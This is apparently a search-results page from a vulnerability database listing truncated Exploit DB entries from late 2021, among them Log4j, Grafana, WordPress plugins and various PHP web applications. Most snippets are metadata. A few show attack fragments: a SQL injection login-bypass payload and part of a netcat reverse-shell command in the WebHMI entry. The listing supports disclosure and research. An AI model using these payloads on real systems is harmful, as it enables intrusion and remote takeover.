Lucene search
K
ExploitdbRecent

47904 matches found

Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.287 views

TRIGONE Remote System Monitor 3.61 - Unquoted Service Path

Exploit Title: TRIGONE Remote System Monitor 3.61 - Unquoted Service Path Discovery by: Yehia Elghaly Date: 30-12-2021 Vendor Homepage: https://www.trigonesoft.com/ Software Link: https://www.trigonesoft.com/download/RemoteSystemmonitorServer3.61x86Setup.exe Tested Version: 3.61 Vulnerability Typ...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.256 views

Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)

Exploit Title: Hospitalss Patient Records Management System 1.0 - 'id' SQL Injection Authenticated Date: 30/12/2021 Exploit Author: twseptian Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.288 views

Hospitals Patient Records Management System 1.0 - Account TakeOver

Exploit Title: Hospitals Patient Records Management System 1.0 - Account TakeOver Date: 30/12/2021 Exploit Author: twseptian Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.458 views

BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)

Exploit Title: BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting XSS Unauthenticated Google Dork: intext:"BeyondTrust" "Redistribution Prohibited" Date: 30/12/2021 Exploit Author: Malcrove Vendor Homepage: https://www.beyondtrust.com/ Version: v6.0 and earlier versions Summary:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.390 views

Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)

Exploit Title: Terramaster TOS 4.2.15 - Remote Code Execution RCE Unauthenticated Date: 12/24/2021 Exploit Author: n0tme thatsn0tmysite Full Write-Up: https://thatsn0tmy.site/posts/2021/12/how-to-summon-rces/ Vendor Homepage: https://www.terra-master.com/ Version: TOS 4.2.X 4.2.15-2107141517 Test...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.257 views

Hostel Management System 2.1 - Cross Site Scripting (XSS)

Exploit Title: Hostel Management System 2.1 - Cross Site Scripting XSS Date: 26/12/2021 Exploit Author: Chinmay Vishwas Divekar Vendor Homepage: https://phpgurukul.com/hostel-management-system/ Software Link: https://phpgurukul.com/hostel-management-system/ Version: V 2.1 Tested on: PopOS20.10...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.329 views

Nettmp NNT 5.1 - SQLi Authentication Bypass

Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass Date: 23/12/2021 Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://wiki.nettemp.tk Software Link: https://wiki.nettemp.tk Version: nettmp NNT Tested on: Linux Ubuntu 20.04 Payload: username: 1' or 1=1;-- password: \ Proo...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.242 views

AWebServer GhostBuilding 18 - Denial of Service (DoS)

Exploit Title: AWebServer GhostBuilding 18 - Denial of Service DoS Date: 28/12/2021 Exploit Author: Andres Ramos Invertebrado Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en Version: AWebServer...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.255 views

Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)

Exploit Title: Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting XSS Google Dork: NA Date: 03-OCT-2021 Exploit Author: Akash Rajendra Patil Vendor Homepage: https://www.yahoobaba.net/project/library-system-in-php Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.304 views

SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)

Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting XSS Date: 28/12/2021 Exploit Author: Momen Eldawakhly - Cyber Guy - Resecurity Inc Vendor Homepage: https://www.safarimontage.com/ Version: 8.3 and 8.5 Tested on: Ubuntu Linux Firefox CVE: CVE-2021-45425 Proof of Concept: GET...

6.1CVSS6.3AI score0.03394EPSS
Exploits4
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.285 views

WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)

Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read Unauthenticated Date: 23/12/2021 Exploit Authors: Nicole Sheinin, Liad Levy Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/ Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/ Versio...

7.5CVSS7.6AI score0.77944EPSS
Exploits5
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.322 views

Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Exploit Title: Online Admission System 1.0 - Remote Code Execution RCE Unauthenticated Date: 23/12/2021 Exploit Author: Jeremiasz Pluta Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System Software Link: https://github.com/rskoolrash/Online-Admission-System Tested on: LAMP Stack...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.313 views

WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)

Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting XSS Unauthenticated Date: 22/12/2021 Exploit Author: gx1 Vulnerability Discovery: Gaetano Perrone Vendor Homepage: https://www.crmperks.com/ Software Link: https://wordpress.org/plugins/contact-form-entries/ Version...

6.1CVSS6.3AI score0.842EPSS
Exploits5
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.429 views

RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: RiteCMS 3.1.0 - Remote Code Execution RCE Authenticated Date: 25/07/2021 Exploit Author: faisalfs10x https://github.com/faisalfs10x Vendor Homepage: https://ritecms.com/ Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip Version: = 3.1.0...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.296 views

RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)

Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion Authenticated Date: 25/07/2021 Exploit Author: faisalfs10x https://github.com/faisalfs10x Vendor Homepage: https://ritecms.com/ Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip Version: = 3.1.0...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.262 views

Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)

Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow DoS Discovered by: Yehia Elghaly Discovered Date: 22/12/2021 Vendor Homepage: https://www.accu-time.com/ Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/ Tested Version: 1.0 Vulnerability Type:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.251 views

Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)

Exploit Title: Movie Rating System 1.0 - Broken Access Control Admin Account Creation Unauthenticated Date: 22/12/2021 Exploit Author: Tagoletta Tağmaç Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html Version: 1.0 Teste...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.277 views

Automox Agent 32 - Local Privilege Escalation

Exploit Title: Automox Agent 32 - Local Privilege Escalation Date: 13/12/2021 Exploit Author: Greg Foss Writeup: https://www.lacework.com/blog/cve-2021-43326/ Vendor Homepage: https://www.automox.com/ Software Link: https://support.automox.com/help/agents Version: 31, 32, 33 Tested on: Windows 10...

7.8CVSS7.7AI score0.01234EPSS
Exploits5
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.310 views

ConnectWise Control 19.2.24707 - Username Enumeration

Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration Date: 17/12/2021 Exploit Author: Luca Cuzzolin aka czz78 Vendor Homepage: https://www.connectwise.com/ Version: vulnerable = 19.2.24707 CVE : CVE-2019-16516 https://github.com/czz/ScreenConnect-UserEnum from multiprocessing impo...

5.3CVSS5.4AI score0.19097EPSS
Exploits4
Exploit DB
Exploit DB
added 2022/01/05 12:0 a.m.322 views

Vodafone H-500-s 3.5.10 - WiFi Password Disclosure

Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure Date: 01/01/2022 Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://www.vodafone.es/ Software Link: N/A Version: Firmware version Vodafone-H-500-s-v3.5.10 Hardware model: Sercomm VFH500 The WiFi access point password...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/20 12:0 a.m.277 views

Exponent CMS 2.6 - Multiple Vulnerabilities

Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities Exploit Author: heinjame Date: 22/10/2021 Exploit Author: picaroo Vendor Homepage: https://www.exponentcms.org/ Version: http://127.0.0.1:8082/expcms/text/edit/id/id/src/@footer Title, Text Block Payload = " Database credential are...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/20 12:0 a.m.584 views

WBCE CMS 1.5.1 - Admin Password Reset

Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset Google Dork: intext: "Way Better Content Editing" Date: 20/12/2021 Exploit Author: citril or https://github.com/maxway2021 Vendor Homepage: https://wbce.org/ Software Link: https://wbce.org/de/downloads/ Version: = 1.5.1 Tested on: Linux CVE :...

9.8CVSS9.7AI score0.37824EPSS
Exploits4
Exploit DB
Exploit DB
added 2021/12/20 12:0 a.m.334 views

phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)

Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution RCE Unauthenticated Date: 18/12/2021 Exploit Author: Halit AKAYDIN hLtAkydn Vendor Homepage: https://www.phpkf.com/ Software Link: https://www.phpkf.com/indirme.php Version: 3.00 Category: Webapps Tested on: Linux/Windows phpKF-CMS; It...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/16 12:0 a.m.432 views

Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)

Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery CSRF Date: November 29, 2021 Exploit Author: =LL= Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/ Vendor Homepage: https://github.com/arunna Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/16 12:0 a.m.322 views

Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)

Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting XSS Date: 06/12/2021 Exploit Author: Enes Özeser Vendor Homepage: https://croogo.org/ Software Link: https://downloads.croogo.org/v3.0.2.zip Version: 3.0.2 Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3 ==...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/16 12:0 a.m.310 views

Croogo 3.0.2 - Unrestricted File Upload

Exploit Title: Croogo 3.0.2 - Unrestricted File Upload Date: 06/12/2021 Exploit Author: Enes Özeser Vendor Homepage: https://croogo.org/ Software Link: https://downloads.croogo.org/v3.0.2.zip Version: 3.0.2 Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3 == 'setting-43'...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/16 12:0 a.m.334 views

Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration

Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration Date: 13/12/2021 Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed Vendor Homepage: https://www.cybelesoft.com Software Link: https://www.cybelesoft.com/thinfinity/virtualui/ Version: vulnerable v3.0 Tested on:...

5.3CVSS5.8AI score0.23141EPSS
Exploits4
Exploit DB
Exploit DB
added 2021/12/15 12:0 a.m.378 views

Oliver Library Server v5 - Arbitrary File Download

Exploit Title: Oliver Library Server v5 - Arbitrary File Download Date: 14/12/2021 Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group Vendor Homepage: https://www.softlinkint.com/product/oliver/ Product: Oliver Server v5 Version: /oliver/FileServlet?source=serverFile&fileName= 2...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/14 12:0 a.m.560 views

Apache Log4j2 2.14.1 - Information Disclosure

Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure Date: 12/12/2021 Exploit Author: leonjza Vendor Homepage: https://logging.apache.org/log4j/2.x/ Version: None: printf' i| new connection from self.clientaddress0' sock = self.request sock.recv1024 sock.sendallLDAPHEADER data =...

10CVSS9.8AI score0.99999EPSS
Exploits354
Exploit DB
Exploit DB
added 2021/12/14 12:0 a.m.317 views

Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)

Exploit Title: Laravel Valet 2.0.3 - Local Privilege Escalation macOS Exploit Author: leonjza Vendor Homepage: https://laravel.com/docs/8.x/valet Version: v1.1.4 to v2.0.3 !/usr/bin/env python2 Laravel Valet v1.1.4 - 2.0.3 Local Privilege Escalation macOS February 2017 - @leonjza Affected version...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/14 12:0 a.m.576 views

Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)

Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution RCE Authenticated Vulnerability founder: AkkuS Date: 13/12/2021 Exploit Author: 0sunday Vendor Homepage: https://www.bookedscheduler.com/ Software Link: N/A Version: Booked Scheduler 2.7.5 Tester on: Kali 2021.2 CVE: CVE-2019-9581...

8.8CVSS8.9AI score0.1349EPSS
Exploits4
Exploit DB
Exploit DB
added 2021/12/14 12:0 a.m.420 views

Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)

Exploit Title: Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery CSRF Date: 13/12/2021 Exploit Author: LiquidWorm Vendor Homepage: https://www.axesstmc.com/cloki/ !-- Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control Vendor: Zucchetti Axess S.p.A. Product...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/14 12:0 a.m.762 views

Apache Log4j 2 - Remote Code Execution (RCE)

Exploit Title: Apache Log4j 2 - Remote Code Execution RCE Date: 11/12/2021 Exploit Authors: kozmer, z9fr, svmorris Vendor Homepage: https://logging.apache.org/log4j/2.x/ Software Link: https://github.com/apache/logging-log4j2 Version: versions 2.0-beta-9 and 2.14.1. Tested on: Linux CVE:...

10CVSS9.8AI score0.99999EPSS
Exploits354
Exploit DB
Exploit DB
added 2021/12/14 12:0 a.m.393 views

Microsoft Internet Explorer / ActiveX Control - Security Bypass

Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass Exploit Author: John Page aka hyp3rlinx Website: hyp3rlinx.altervista.org Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt twitter.com/hyp3rlinx ISR:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/14 12:0 a.m.486 views

Online Thesis Archiving System 1.0 - SQLi Authentication Bypass

Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass Exploit Author: Yehia Elghaly YME Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html Version: Onli...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/14 12:0 a.m.367 views

meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: meterN v1.2.3 - Remote Code Execution RCE Authenticated Date: 18/11/2021 Exploit Author: LiquidWorm Vendor Homepage: https://www.metern.org !-- meterN v1.2.3 Authenticated Remote Command Execution Vulnerability Vendor: Jean-Marc Louviaux Product web page: https://www.metern.org...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/14 12:0 a.m.405 views

WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)

Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting XSS Authenticated Date: 29/11/2021 Exploit Author: Mansi Singh Vendor Homepage: https://wordpress.org/plugins/typebot/ Software Link: https://wordpress.org/plugins/typebot/ Tested on Windows Reference:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/13 12:0 a.m.261 views

HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)

Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion LFI Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0" Date: 11/12/2021 Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: N/A Version: V2.0 Tested on: Nginx NVRDVRIPC Web Server Proof of...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/13 12:0 a.m.239 views

WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: WebHMI 4.0 - Remote Code Execution RCE Authenticated Date: 12/12/2021 Exploit Author: Jeremiasz Pluta Vendor Homepage: https://webhmi.com.ua/en/ Version: WebHMI Firmware """ payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2%261|nc+""" + localhost + """+""" +...

10CVSS9.8AI score0.35804EPSS
Exploits5
Exploit DB
Exploit DB
added 2021/12/10 12:0 a.m.520 views

OpenCATS 0.9.4 - Remote Code Execution (RCE)

Exploit Title: OpenCATS 0.9.4 - Remote Code Execution RCE Google Dork: intext:"Current Available Openings, Recently Posted Jobs" Date: 21/09/2021 Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar Vendor Homepage: https://www.opencats.org/ Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/10 12:0 a.m.609 views

Free School Management Software 1.0 - Remote Code Execution (RCE)

Exploit Title: Free School Management Software 1.0 - Remote Code Execution RCE Exploit Author: fuuzap1 Date: 7-12-2021 Category: Web application Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/10 12:0 a.m.333 views

Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)

Exploit Title: Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting XSS Exploit Author: fuzzyap1 Date: 7-12-2021 Category: Web application Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/09 12:0 a.m.331 views

Chikitsa Patient Management System 2.0.2 - 'backup' Remote Code Execution (RCE) (Authenticated)

Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution RCE Authenticated Date: 03/12/2021 Exploit Author: 0z09e https://twitter.com/0z09e Vendor Homepage: https://sourceforge.net/u/dharashah/profile/ Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/09 12:0 a.m.390 views

MTPutty 1.0.1.21 - SSH Password Disclosure

Exploit Title: MTPutty 1.0.1.21 - SSH Password Disclosure Exploit Author: Sedat Ozdemir Version: 1.0.1.21 Date: 06/12/2021 Vendor Homepage: https://ttyplus.com/multi-tabbed-putty/ Tested on: Windows 10 Proof of Concept ================ Step 1: Open MTPutty and add a new SSH connection. Step 2:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/09 12:0 a.m.365 views

Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)

Exploit Title: Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting XSS Exploit Author: able403 Date: 08/12/2021 Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/09 12:0 a.m.546 views

Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution RCE Authenticated Date 07.12.2021 Exploit Author: Ron Jost Hacker5preme Vendor Homepage: https://wordpress.org/plugins/catch-themes-demo-import/ Software Link:...

7.2CVSS7.2AI score0.55729EPSS
Exploits6
Exploit DB
Exploit DB
added 2021/12/09 12:0 a.m.354 views

Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass

Exploit Title: Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass Exploit Author: able403 Date: 08/12/2021 Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/09 12:0 a.m.440 views

LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution RCE Authenticated Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login Date: 05/12/2021 Exploit Author: Y1LD1R1M Vendor Homepage: https://www.limesurvey.org/ Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/09 12:0 a.m.479 views

TestLink 1.19 - Arbitrary File Download (Unauthenticated)

Exploit Title: TestLink 1.19 - Arbitrary File Download Unauthenticated Google Dork: inurl:/testlink/ Date: 07/12/2021 Exploit Author: Gonzalo Villegas Cl34r Exploit Author Homepage: https://nch.ninja Vendor Homepage: https://testlink.org/ Version:1.16 = 1.19 CVSS:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2021/12/09 12:0 a.m.794 views

Grafana 8.3.0 - Directory Traversal and Arbitrary File Read

Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read Date: 08/12/2021 Exploit Author: s1gh Vendor Homepage: https://grafana.com/ Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p Version: V8.0.0-beta1 through V8.3.0 Description...

7.5CVSS7.8AI score0.88849EPSS
Exploits44
Total number of security vulnerabilities47904